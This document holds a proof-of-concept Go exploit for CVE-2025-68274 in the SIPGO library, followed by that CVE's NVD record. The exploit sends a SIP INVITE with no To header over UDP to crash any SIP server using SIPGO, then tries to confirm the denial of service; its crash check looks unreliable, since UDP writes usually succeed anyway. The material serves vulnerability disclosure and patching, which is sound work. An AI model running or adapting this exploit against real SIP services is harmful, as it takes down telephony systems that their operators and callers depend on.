CVE-2025-68274

package main import ( "net" "strings" "time" ) // PoC for CVE-2025-68274: SIPGO nil pointer dereference // Send a malformed SIP INVITE request without To header func main() { // Target SIP server address target := "127.0.0.1:5060" // Malformed SIP INVITE request without To header // This triggers nil pointer dereference in NewResponseFromRequest malformedINVITE := "INVITE sip:[email protected] SIP/2.0\r\n" + "Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776sgk2\r\n" + "Max-Forwards: 70\r\n" + // Missing To header - this is the key trigger "From: <sip:[email protected]>;tag=12345\r\n" + "Call-ID: [email protected]\r\n" + "CSeq: 1 INVITE\r\n" + "Contact: <sip:[email protected]:5060>\r\n" + "Content-Type: application/sdp\r\n" + "Content-Length: 0\r\n" + "\r\n" // Connect and send malformed request conn, err := net.DialTimeout("udp", target, 5*time.Second) if err != nil { panic(err) } defer conn.Close() // Send the malicious SIP message _, err = conn.Write([]byte(malformedINVITE)) if err != nil { panic(err) } // Keep connection alive to observe crash time.Sleep(2 * time.Second) // Try to verify server is down _, err = conn.Write([]byte(strings.Replace(malformedINVITE, "INVITE", "OPTIONS", 1))) if err != nil { println("Target appears to be crashed (DoS successful)") } } /* Vulnerability Analysis: 1. The malformed SIP INVITE lacks the To header field 2. SIPGO's NewResponseFromRequest assumes To header exists 3. Without nil check, accessing To header causes crash 4. This affects all SIP operations using the vulnerable function Mitigation: Upgrade to SIPGO version 1.0.0-alpha-1 or later */

{"cve": {"id": "CVE-2025-68274", "sourceIdentifier": "[email protected]", "published": "2025-12-16T22:15:50.830", "lastModified": "2026-03-05T19:52:09.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-755"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emiago:sipgo:*:*:*:*:*:go:*:*", "versionStartIncluding": "0.30.0", "versionEndExcluding": "1.0.0", "matchCriteriaId": "2A3CF6C1-221C-4B0A-AC28-C829F371C968"}]}]}], "references": [{"url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}